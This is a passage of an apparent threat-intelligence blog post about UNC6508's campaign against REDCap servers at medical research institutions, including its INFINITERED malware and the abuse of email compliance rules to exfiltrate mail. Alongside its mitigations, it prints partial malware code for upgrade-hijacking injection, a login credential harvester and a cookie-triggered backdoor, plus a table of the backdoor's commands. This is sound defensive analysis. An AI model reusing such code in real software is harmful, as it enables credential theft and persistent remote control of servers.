Providers&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (IdP) and ensure &lt;/span&gt;&lt;a href="https://knowledge.workspace.google.com/admin/security/about-2sv-enforcement-for-admins" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;2-Step Verification&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (2SV) is enabled across all accounts.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Campaign Overview&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The campaign targeted a diverse set of national, state, and private medical entities. These organizations comprise world-renowned clinical providers, premier academic centers, North American military health institutions, professional advocacy groups, and health regulatory bodies. Their research areas span a broad spectrum of modern medicine, from molecular discovery and clinical drug trials to state-level public health policy and military readiness. They employ thousands of people with a combined research budget in the billions of dollars.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The earliest known compromise occurred in September 2023, after which GTIG observed a consistent operational pattern. The threat actor exploited externally facing &lt;/span&gt;&lt;a href="http://project-redcap.org" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;REDCap&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (Research Electronic Data Capture) servers and deployed custom malware named INFINITERED to capture legitimate REDCap login credentials. Then, after remaining undetected for more than a year, UNC6508 used the captured credentials to access the victim’s internal network. The threat actor was also observed using the novel technique of manipulating domain content compliance rules for data exfiltration. Lastly, UNC6508 used sophisticated operations security (OpSec) techniques to conceal and obfuscate their activity. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG collaborated closely with Mandiant Consulting, the FLARE team, and Workspace Security on this effort to combine our threat intelligence, incident response, and reverse engineering expertise across Google Cloud. This enabled us to develop a complete picture of the &lt;/span&gt;&lt;a href="https://cloud.google.com/security/resources/insights/targeted-attack-lifecycle"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;attack lifecycle&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; from initial compromise to complete mission. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG also extends thanks to the affected organizations for their cooperation and the valuable post-exploitation insights they shared.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Prevention, Detection, and Remediation&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG recommends defenders implement the following security measures, across all Cloud enterprise platforms, to mitigate this threat:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Secure Admin Accounts&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Enforce phishing-resistant &lt;/span&gt;&lt;a href="https://knowledge.workspace.google.com/admin/security/deploy-2-step-verification" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;2-Step Verification (2SV)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for enterprise administrator accounts, including through third-party Identity Providers.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Advanced Protection&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Consider enrolling highly sensitive accounts in our &lt;/span&gt;&lt;a href="https://landing.google.com/intl/en_in/advancedprotection/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Advanced Protection Program&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for additional safeguards against malware and phishing attacks.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Prevent Cookie Theft&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Enforce &lt;/span&gt;&lt;a href="https://knowledge.workspace.google.com/admin/security/prevent-cookie-theft-with-session-binding" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Device Bound Session Credentials&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (DBSC) with &lt;/span&gt;&lt;a href="https://knowledge.workspace.google.com/admin/security/protect-your-business-with-context-aware-access" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CAA&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for highly sensitive accounts on Windows devices to prevent session hijacking.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Monitor Audit Logs&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Enable &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/logging/docs/audit/gsuite-audit-logging"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Audit logs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to analyze, monitor, and alert on changes to your data.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Control Data&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Define &lt;/span&gt;&lt;a href="https://knowledge.workspace.google.com/admin/security/about-dlp" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Data Loss Prevention (DLP) rules&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to block or alert on external sharing of sensitive data.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Audit Compliance Rules&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Review &lt;/span&gt;&lt;a href="https://knowledge.workspace.google.com/admin/reports/admin-log-events" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Admin audit logs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and content compliance rules for unauthorized modifications.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SIEM Coverage&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Consider using &lt;/span&gt;&lt;a href="https://cloud.google.com/security/products/security-operations"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Security Operations&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (SecOps) and ensure Workspace logs are included in your Security Information and Event Management (SIEM) pipeline.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Password Protection&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Use Chrome Enterprise &lt;/span&gt;&lt;a href="https://support.google.com/chrome/a/answer/13597868?hl=en" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Password Leak Detection&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to alert when potentially compromised password use is detected.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Patch REDCap&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Fully updated REDCap installations to the latest software version and ensure older versions are completely removed.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Monitor for INFINITERED&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Scan REDCap servers for the presence of INFINITERED using the provided YARA rule and IOCs.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Medical Research University Compromise&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In September 2023, a &lt;/span&gt;&lt;a href="http://project-redcap.org" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;REDCap&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; server belonging to a North American medical research institution was compromised. Continuing activity was observed through November 2025. During this time period, UNC6508 carried out the following attack chain.&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Exploit the REDCap server.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;After three months, deploy the INFINITERED malware.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;INFINITERED stealthily records credentials, and persists through upgrades, for more than a year.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Pivot to a domain admin account.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Add the malicious content compliance rule.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Silently “BCC-forward” matched emails to a threat actor-controlled account.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Campaign attack flow diagram" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/inifinitered-fig1.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 1: Campaign attack flow diagram&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Initial Access: REDCap Exploitation and INFINITERED&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;UNC6508 consistently targets REDCap servers. REDCap is a web-based software platform designed specifically for building and managing online databases and surveys, in compliance with regulations for medical and scientific research. It is a commonly used platform in the North American medical research community.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG was not able to confirm how UNC6508 initially gained access to the REDCap server. By design, REDCap allows administrators to continue running legacy software side-by-side with the current version. UNC6508 was observed probing for these vulnerable legacy versions on several target organizations’ REDCap systems. This highlights not only the increasing importance of rapidly applying security patches, but also promptly removing older software versions to prevent &lt;/span&gt;&lt;a href="https://attack.mitre.org/techniques/T1689/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;downgrade attacks&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Upon establishing a foothold on the REDCap server, UNC6508 performed internal reconnaissance and credential discovery to obtain database and service account credentials. The threat actor also deployed a web shell named "&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;help.php&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;", which maintained persistence and functioned as an uploader in the REDCap application.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;INFINITERED Analysis&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Three months after the initial compromise, UNC6508 deployed a custom malware payload tracked as INFINITERED. This malware implements its functionality across three distinct modular components by trojanizing legitimate REDCap system files.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Dropper and Upgrade Interception &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Credential Harvester&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Backdoor, with command and control (C2)&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG discovered multiple organizations across the US and Canada compromised with INFINITERED. All of these organizations were promptly notified of the compromise upon detection and offered our assistance with remediation.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="INFINITERED diagram" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/inifinitered-fig2.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 2: INFINITERED diagram&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Dropper and Upgrade Interception&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To maintain persistent remote access, INFINITERED injects its code into new REDCap versions by intercepting the upgrade process. This capability is embedded into the legitimate REDCap upgrade system file. INFINITERED performs this code injection following these steps.&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Read the current software version, which includes the INFINITERED code. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Extract the malicious logic using GUID delimiter &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;b49e334d-9c01-463e-9bc5-00a6920fb66e.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Inject backdoor code into the custom hooks configuration file. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Inject credential harvester code into the authentication system file.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Inject the extracted code from step 2 into the upgrade system file.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In Elastic Beanstalk environments, INFINTERED performs additional steps to ensure persistence in cloud deployments. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;// b49e334d-9c01-463e-9bc5-00a6920fb66e
...
$file_upgrade = $base_path."Upgrade.php"; 
$file_content_upgrade = $zip-&amp;gt;getFromName($file_upgrade); // new upgrade file content
$file_content_upgrade_local = file_get_contents(__FILE__); // Contents of the current file 
...
if ($file_content_upgrade !== false) {
    // Base64 GUID delimiter
    $dummy_marker = base64_decode('YjQ5ZTMzNGQtOWMwMS00NjNlLTliYzUtMDBhNjkyMGZiNjZl');
    $pattern = "/$dummy_marker(.*?)$dummy_marker/s";
    if (preg_match($pattern, $file_content_upgrade_local, $matches)) {
        $extracted_text = $matches[0];
        $search_content = "// If running on AWS Elastic Beanstalk"; 
        $upgrade_decode = "// ".$extracted_text."\r\n\t\t".$search_content;
        $new_content = str_replace($search_content, $upgrade_decode, $file_content_upgrade);
        $zip-&amp;gt;deleteName($file_upgrade);
        $zip-&amp;gt;addFromString($file_upgrade, $new_content);
    }
}
$zip-&amp;gt;close();
...
// b49e334d-9c01-463e-9bc5-00a6920fb66e&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Code Snippet 1: Intercept upgrades and inject INFINITERED code&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Credential Harvester&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;INFINITERED injects a credential harvester into the authentication system file to compromise user accounts. This component of the malware captures usernames and passwords submitted via POST requests during the login process. The credentials are encrypted using the environment’s default encryption routine and hidden inside a local REDCap sessions database table with the string “&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;xc32038474a” &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;prefixed to the Session ID. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;$currentUTC = gmdate('Y-m-d H:i:s');
$str = encrypt($currentUTC . '[::]' . $_POST['username'] . '[::]' . $_POST['password']);
include dirname(__FILE__, 3) . DIRECTORY_SEPARATOR . 'redcap_connect.php';
$expiration_timestamp = strtotime("+60 days", strtotime($currentUTC));
$session_id = 'xc32038474a'.substr(bin2hex($currentUTC), -20);
$session_sql = "INSERT INTO [REDACTED] ([REDACTED],[REDACTED],[REDACTED]) VALUES ('$session_id', '$str', FROM_UNIXTIME($expiration_timestamp))";
@$rc_connection-&amp;gt;query($session_sql);&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Code Snippet 2: Hide credentials in a legitimate database table&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Backdoor&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;INFINITERED also has backdoor functionality it establishes in the custom hooks system file inside the update package, specifically within a function that executes on every REDCap page load. This global hook ensures the backdoor runs on every page load. INFINITERED looks for a specific HTTP Cookie parameter named "&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;REDCAP-TOKEN&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;" and a cookie value starting with a specific plaintext string. If these conditions are present, the malware strips the prefix and decrypts the remaining payload with the environment's default decryption routine.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-markup"&gt;&lt;code&gt;$cookieValue = $_COOKIE['REDCAP-TOKEN'];
if ($cookieValue) {
    $magic_flag = '[REDACTED]'; // Cookie prefix
    ...
    // Decrypt message if cookie prefix is found
    $key = '[REDACTED]';
    $req_data = substr($cookieValue, strlen($magic_flag));
    $req_data = decrypt($req_data, $key);&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Code Snippet 3: Decrypting commands to INFINITERED&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If the decrypted payload is empty, the malware acts as a beacon, returning system details such as the OS, PHP version, working directory, and database credentials including the hostname, username, password, and salt. When non-empty, the malware will parse the payload for command tags, which the threat actor can use to execute shell commands, run raw SQL queries, and transfer files.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Supported Commands&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;INFINITERED is capable of executing the following commands.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="center"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Command Tag&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;00&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Executes arbitrary system commands using shell_exec.&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;02&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Uploads a file to the server. The payload contains the destination path and file content.&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;03&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Retrieves stolen credentials stored in the legitimate database table.&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;04&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Deletes the stolen credential records from the legitimate database table.&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;05&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Executes arbitrary SQL queries against the database and returns the results.&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ej671a16i7fd8202nu6ltfg5p6x7u&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Downloads an arbitrary file from the server. The payload following this tag specifies the full filesystem path of the target file.&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Empty Payload&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Beacons system information, database credentials, and configuration details.&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;Table 1: Supported commands for INFINITERED&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Domain Content Compliance Rule Abuse&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;More than a year after the initial compromise, UNC6508 used overlapping credentials, harvested from REDCap, to access an administrator account. This underscores the challenge and importance of securing systems holistically. Defenders should enable &lt;/span&gt;&lt;a href="https://knowledge.workspace.google.com/admin/security/deploy-2-step-verification" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;2-Step Verification (2SV)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and ensure unique credentials are used across different security domains to mitigate credential replay attacks.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;UNC6508 then leveraged &lt;/span&gt;&lt;a href="https://knowledge.workspace.google.com/admin/gmail/advanced/set-up-rules-for-advanced-email-content-filtering#compliance_rules" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;content compliance rules&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a legitimate feature present in many cloud-based enterprise productivity suites, to exfiltrate specific email communications. Administrators can create these rules to manage email messages that contain content matching predefined sets of words, phrases, text patterns, or numerical patterns. By default, compliance rules apply to all users in an organizational unit. The use of compliance rules for data exfiltration is a novel technique not previously observed with PRC-nexus threat actors.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Specifically, UNC6508 created a compliance rule named "&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Patroit&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;" [sic] that used regular expressions to match on keyword and email address patterns in sent or received emails. Matches were silently BCC-forwarded to a threat actor-controlled Gmail address, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;BebitaBarefoot774[@]gmail[.]com&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, providing a covert and continuous stream of exfiltrated data. Upon discovery, GTIG disabled the Gmail account to prevent further data exfiltration.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
